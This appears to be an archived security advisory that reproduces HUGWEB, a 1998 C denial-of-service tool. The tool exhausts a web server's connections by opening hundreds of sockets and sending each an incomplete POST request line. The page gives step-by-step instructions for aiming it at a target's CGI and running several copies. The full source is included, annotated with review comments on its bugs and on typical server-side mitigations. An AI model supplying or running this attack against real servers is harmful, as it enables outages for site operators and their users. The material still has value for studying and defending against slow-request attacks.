COMMAND

    httpd

SYSTEMS AFFECTED

    ???

PROBLEM

    ET LoWNOISE found the following.  The program below fills all the
    possible connections to a web server, sometimes bringing the server
    down (or slowing it to a crawl).  As the listing shows, it opens many
    connections at once and sends on each only the first line of a POST
    request, which it never completes.  All you need is a good server to
    run this program and a nice target with a CGI that uses the POST
    method.  (You can use any CGI; just check that it uses POST.)

    TO DUMMIES: Take the source code  of the html page where the  form
    is   it.      check   it,    and   look    for   something    like
    <host>/cgi-bin/<name_of_cgi> (there are some default cgi WITH POST
    METHOD).  Now:

	Hugweb <host> /cgi-bin/<name_of_cgi> &

    Sometimes depending on  how fast is  your server and  conection or
    the target server speed  u will have to  run the proggy 3  or more
    times in background.  Exploit follows:

    /* HUGWEB
       ET [Lownoise] - Colombia 1998.
       Copyshit (:Q~) ET 1998.

	ET <et@cyberspace.org>
	LowNoise <lownoise@cyberspace.org>

       Why is necesary a disclaimer when nobody reads it?.

       Compile for dummies
       ===================
	      gcc -o hugweb hugweb.c -lsocket -lnsl
    */

    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>



    /* File-scope state shared with main(); all of it is zero-initialised
       static storage except numsock. */

    /* destino: copy of argv[1] (host name or dotted quad).
       cgi:     copy of argv[2] (request path).
       NOTE(review): main() fills both with strcpy(), so these sizes are not
       enforced against the command-line arguments. */
    char destino[99],
	 cgi[50];

    /* Request line built in main() as "POST " + cgi + " HTTP/1.0" + enter. */
    char linea1[100];  /* POST Call (JUST A HUG)*/

    /* codigo: outer-loop pass counter; x: connect() result; i: socket index.
       a,b,c,d: sscanf() targets used only to test whether destino looks like
       a dotted quad; the parsed values are not used afterwards. */
    int codigo,x,i,
	a,b,c,d;

    /* Descriptor table; only the first numsock entries are used. */
    int sock[1000];
    int numsock = 400;  /* BE CAREFULL WITH THIS NUMBER (NUMBER OF SOCKETS OPEN AT THE SAME TIME)*/

    /* Destination address (filled in main()) and its dotted-quad text form. */
    struct sockaddr_in sock_dest;
    char host_dest[100];

    /* Line terminator appended to the request line; main() sets it to "\n". */
    char enter[2];

    /*
     * Entry point.  Resolves argv[1] to an IPv4 address, opens numsock TCP
     * connections to port 80 of that address, and sends on each connection
     * the single line "POST <argv[2]> HTTP/1.0\n".  No headers, body or
     * terminating blank line are ever sent.
     *
     * What a server operator would see from this listing: numsock concurrent
     * connections from one client address, each carrying only a request line.
     * Presumably the server keeps a connection slot occupied while it waits
     * for the rest of each request, which matches the advisory's description
     * of filling all available connections.
     *
     * NOTE(review): the advisory lists no fix.  Per-client connection limits
     * and a timeout on receiving a complete request are the usual server-side
     * controls for this pattern (general practice, not stated on this page).
     *
     * Every error path calls exit(0), so the exit status does not distinguish
     * failure from success.  No return type is declared (implicit int) and no
     * value is returned.
     */
    main(int argc,char *argv[])
    {
       struct hostent *target;

       /* Line terminator is a bare LF, not CR LF. */
       enter[0]='\n';
       enter[1]='\0';

       /* NOTE(review): this only rejects a call with no arguments, yet
          argv[2] is read below; with exactly one argument argv[2] is NULL. */
       if(argc < 2){
	 fprintf(stdout,"Usage: %s <target> </dir/cgi> \n",argv[0]);
	 exit(0);
       }

       /* NOTE(review): unbounded copies into destino[99] and cgi[50]; longer
          arguments write past the end of these arrays. */
       strcpy(destino,argv[1]);
       strcpy(cgi,argv[2]);

       /* Treat the target as a literal address if it starts with four
          dot-separated integers; the values are not range-checked.
          Otherwise resolve it as a host name. */
       if (sscanf(destino,"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
	  target = gethostbyname(destino);
	  if (target == NULL) {
	     fprintf(stdout,"Ahhhhhhh! cannot resolve host %s\n",destino);
	     exit(0);
	  }
	  /* Format the first four bytes of the first returned address as a
	     dotted quad (assumes an IPv4 result; h_addrtype is not checked). */
	  sprintf(host_dest,"%d.%d.%d.%d",(unsigned char ) target->h_addr_list[0][0],
					  (unsigned char ) target->h_addr_list[0][1],
					  (unsigned char ) target->h_addr_list[0][2],
					  (unsigned char ) target->h_addr_list[0][3]);
       }
       else {
	  /* Copies at most 99 bytes; byte 99 of the zero-initialised global
	     host_dest[100] is left as the terminator. */
	  strncpy(host_dest,destino,99);
       }
       fprintf(stdout,"[HUGWeb] Attacking : %s\n",host_dest);

       /* Destination is always TCP port 80; the inet_addr() result is not
          checked for failure. */
       sock_dest.sin_family = AF_INET;
       sock_dest.sin_port = htons(80);                         /* www port */
       sock_dest.sin_addr.s_addr = inet_addr(host_dest);

       /* Outer loop is written for 100000 passes (0..99999); see the note on
          the closing loop below for what actually happens. */
       codigo=0;
       while(codigo <= 99999){

	  /* Phase 1: open and connect numsock sockets.  Any socket() or
	     connect() failure ends the program immediately. */
	  i=0;
	  while(i<numsock){
		 sock[i] = socket(AF_INET,SOCK_STREAM,0);
		 if(sock[i] < 0) {
		   fprintf(stdout,"ERROR: socket() failed\n");
		   exit(0);
		 }

		 x = connect(sock[i],(struct sockaddr *) &sock_dest,sizeof(sock_dest));
		 if(x < 0){
		   fprintf(stdout,"Ooooooppppppps ... Can't connect to web server ~:cD\n");
		   exit(0);
	       }
	       i++;
	   }

		 /* Phase 2: build the request line.  Only this one line is
		    ever sent; the request is left incomplete. */
		 /* HUG */
		 strcpy(linea1,"POST ");
		 strcat(linea1,cgi);
	       strcat(linea1," HTTP/1.0");
	       strcat(linea1,enter);

	       //fprintf(stdout,".");
	    i=0;
	  /* Phase 3: send the same line on every connection.  The send()
	     return value is ignored, so short or failed writes go unnoticed. */
	  while(i<numsock){
		 send(sock[i],linea1,strlen(linea1)*sizeof(char),0);
		 //bzero(linea1,strlen(linea1));
		 i++;
	  }

	  /* Phase 4: close.  NOTE(review): i is not advanced inside this loop,
	     so as written it calls close(sock[0]) indefinitely; the remaining
	     descriptors are not closed here, and codigo++ and the final
	     message below are not reached. */
	  i=0;
	  while(i<numsock){
	       close(sock[i]);
	  }
	    codigo++;
       }
       fprintf(stdout,"\nThe END. ET@cyberspace.org Lownoise 1998\n");
    }

SOLUTION

    ???